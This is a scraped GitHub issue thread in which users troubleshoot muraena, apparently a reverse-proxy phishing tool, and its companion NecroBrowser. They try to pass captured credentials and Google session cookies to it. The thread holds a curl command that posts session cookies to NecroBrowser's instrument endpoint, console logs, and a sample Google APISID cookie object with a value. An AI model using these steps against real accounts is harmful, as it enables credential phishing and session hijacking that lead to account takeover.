I'm sure I'me just missing a step but the credentials are not getting passed to the Ne

Here's my config. <a href="https://github.com/muraenateam/muraena/files/3232393/mu

<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/us

I got this. <div class="snippet-clipboard-content notranslate position-relative ov

Login not getting passed to NecroBrowser about muraena HOT 15 CLOSED

infosecwatchman commented on August 30, 2024

from muraena.

Comments (15)

ohpe commented on August 30, 2024

Well, it's tricky to debug this issue in the way you reported.

Did muraena collected the credentials?
Is necrobrowser running?

If you are listening on localhost you shouldn't need any firewall rule.

from muraena.

infosecwatchman commented on August 30, 2024

It collected the username and password, not sure about the cookie. Necrobrowser is running, it is on local host. Is there command I have to run to tell muraena to pass the creds?

from muraena.

ohpe commented on August 30, 2024

Can you share the config?

from muraena.

infosecwatchman commented on August 30, 2024

Here's my config.
muraena-google-config.txt

from muraena.

infosecwatchman commented on August 30, 2024

@ohpe Do I have to change the necrobrowser token to something I create?

from muraena.

ohpe commented on August 30, 2024

The necrobrowser must be the same. Try to send a request manually to necrobrowser and check the console if it works. The issue is a bit too generic and I can't assist. Please, reopen if you find the real cause.

from muraena.

infosecwatchman commented on August 30, 2024

@ohpe What kind of request do I need to send and how?

from muraena.

ohpe commented on August 30, 2024

https://github.com/muraenateam/necrobrowser#zombies

curl -X POST \
  http://<NECRO>/instrument/<TOKEN> \
  -H 'Content-Type: application/json' \
  -d '{
    "provider": "gsuite",
    "keywords": [],
    "debugPort": 9229,
    "sessionCookies": [ <COOKIES> ]
}'

from muraena.

infosecwatchman commented on August 30, 2024

I got this.

$ curl -X POST \
>   http://127.0.0.1:8080/instrument/ada9 \
>   -H 'Content-Type: application/json' \
>   -d '{
>     "provider": "gsuite",
>     "keywords": [],
>     "debugPort": 9229,
>     "sessionCookies": [ <COOKIES> ]
> }'
{"error":"invalid character '\u003c' looking for beginning of value","success":false}

The Necrobrowser console output from it:

$ sudo ./necrobrowser --debug --headless true --token "ada9"
2019-06-03 12:23:48 dbg Pulling image registry.hub.docker.com/zenika/alpine-chrome:latest
2019-06-03 12:23:48 dbg {"status":"Pulling from zenika/alpine-chrome","id":"latest"}
{"status":"Digest: sha256:32518577d989d192cb3420229c2d0b76eec4076cbde7f85b7709d79cb04076de"}
{"status":"Status: Image is up to date for registry.hub.docker.com/zenika/alpine-chrome:latest"}

[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.

[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
 - using env:	export GIN_MODE=release
 - using code:	gin.SetMode(gin.ReleaseMode)

[GIN-debug] POST   /instrument/:token        --> github.com/muraenateam/necrobrowser/server.NewBrowserHandler (8 handlers)
[GIN-debug] POST   /instrumentKnown/:token   --> github.com/muraenateam/necrobrowser/server.KnownBrowserHandler (8 handlers)
[GIN-debug] GET    /status/:token            --> github.com/muraenateam/necrobrowser/server.StatusHandler (8 handlers)
2019-06-03 12:23:48 inf NecroBrowser - by antisnatchor & ohpe
Wwaiting for commands on 0.0.0.0:8080 \m/
Auth Token: ada9
[GIN-debug] Listening and serving HTTP on 0.0.0.0:8080
[GIN] 2019/06/03 - 12:43:05 | 400 |    2.164836ms |       127.0.0.1 | POST     /instrument/ada9
[GIN] 2019/06/03 - 12:43:05 | 400 |    2.494743ms |       127.0.0.1 | POST     /instrument/ada9
[GIN] 2019/06/03 - 12:43:25 | 400 |     915.609µs |       127.0.0.1 | POST     /instrument/ada9
[GIN] 2019/06/03 - 12:43:25 | 400 |    1.089366ms |       127.0.0.1 | POST     /instrument/ada9

from muraena.

ohpe commented on August 30, 2024

The error message is pretty clear. {"error":"invalid character '\u003c' looking for beginning of value","success":false}

from muraena.

infosecwatchman commented on August 30, 2024

Please forgive me, I am unaware of this error, what does this mean?

from muraena.

ohpe commented on August 30, 2024

<COOKIES> is not a valid cookie value.

from muraena.

infosecwatchman commented on August 30, 2024

In what format should the cookie be in? Like this?

{
    "domain": ".google.com",
    "expirationDate": 1622981604.474241,
    "hostOnly": false,
    "httpOnly": false,
    "name": "APISID",
    "path": "/",
    "sameSite": "no_restriction",
    "secure": false,
    "session": false,
    "storeId": "0",
    "value": "q_tyy5AEZKCeFhdN/Ae6bbYW6ncARJQ2zY",
    "id": 3
}

from muraena.

infosecwatchman commented on August 30, 2024

@ohpe Okay, I think made some progress, but am confused at to why the container is requesting access to port 9229 on my local machine.

$ sudo ./necrobrowser --debug --headless true --token "ada9f7b8-6e6*"
[sudo] password for user: 
2019-06-20 17:04:31 dbg Pulling image registry.hub.docker.com/zenika/alpine-chrome:latest
2019-06-20 17:04:31 dbg {"status":"Pulling from zenika/alpine-chrome","id":"latest"}
{"status":"Digest: sha256:f9a5563f407535c1f620e9b3c53538a54582b4095de856872f8f6f2156f2ac29"}
{"status":"Status: Image is up to date for registry.hub.docker.com/zenika/alpine-chrome:latest"}

[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.

[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
 - using env:	export GIN_MODE=release
 - using code:	gin.SetMode(gin.ReleaseMode)

[GIN-debug] POST   /instrument/:token        --> github.com/muraenateam/necrobrowser/server.NewBrowserHandler (8 handlers)
[GIN-debug] POST   /instrumentKnown/:token   --> github.com/muraenateam/necrobrowser/server.KnownBrowserHandler (8 handlers)
[GIN-debug] GET    /status/:token            --> github.com/muraenateam/necrobrowser/server.StatusHandler (8 handlers)
2019-06-20 17:04:31 inf NecroBrowser - by antisnatchor & ohpe
Wwaiting for commands on 0.0.0.0:8080 \m/
Auth Token: ada9f7b8-6e6c-4884-b2a3-ea757c1eb617
[GIN-debug] Listening and serving HTTP on 0.0.0.0:8080
[GIN] 2019/06/20 - 17:07:07 | 400 |    5.927006ms |       127.0.0.1 | POST     /instrument/ada9f7b8-6e6c-4884-b2a3-ea757c1eb617
[GIN] 2019/06/20 - 17:07:07 | 400 |    6.178855ms |       127.0.0.1 | POST     /instrument/ada9f7b8-6e6c-4884-b2a3-ea757c1eb617
2019-06-20 18:46:11 inf Instructing zombie for gsuite
2019-06-20 18:46:11 dbg Loot path doesn't exist, creating
2019-06-20 18:46:11 inf Going HEADLESS mode
2019-06-20 18:46:11 inf Creating a new container gsuite_ywWSQcwdbW
2019-06-20 18:46:11 dbg instructing the docker daemon to start (gsuite_ywWSQcwdbW)[144420185e18d1d9ca4b048145c8d3ee40fe49661fb7d2342ee7cb241b4e5f35]
2019-06-20 18:46:12 dbg Container ready
2019-06-20 18:46:12 dbg 
2019-06-20 18:46:12 imp Retrieving debugger URL from http://127.0.0.1:9229/json
2019-06-20 18:46:12 err Get http://127.0.0.1:9229/json: read tcp 127.0.0.1:46948->127.0.0.1:9229: read: connection reset by peer
2019-06-20 18:46:14 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:16 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:18 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:20 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:22 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:24 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:26 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:28 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:30 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:32 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
2019-06-20 18:46:32 err Get http://127.0.0.1:9229/json: dial tcp 127.0.0.1:9229: connect: connection refused
[GIN] 2019/06/20 - 18:46:32 | 417 | 20.909394655s |       127.0.0.1 | POST     /instrument/ada9f7b8-6e6c-4884-
[GIN] 2019/06/20 - 18:46:32 | 417 | 20.909422565s |       127.0.0.1 | POST     /instrument/ada9f7b8-6e6c-48

from muraena.

imdj598 commented on August 30, 2024

<COOKIES> is not a valid cookie value.

Hi
I'va same problem.
When start necrobrowser this messages appear

Wwaiting for commands on 0.0.0.0:8080 \m/
Auth Token: ada9f........

and don't continue!!
Where is problem
and
How to set Cookie?

from muraena.

Login not getting passed to NecroBrowser about muraena HOT 15 CLOSED

Comments (15)

Related Issues (20)

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent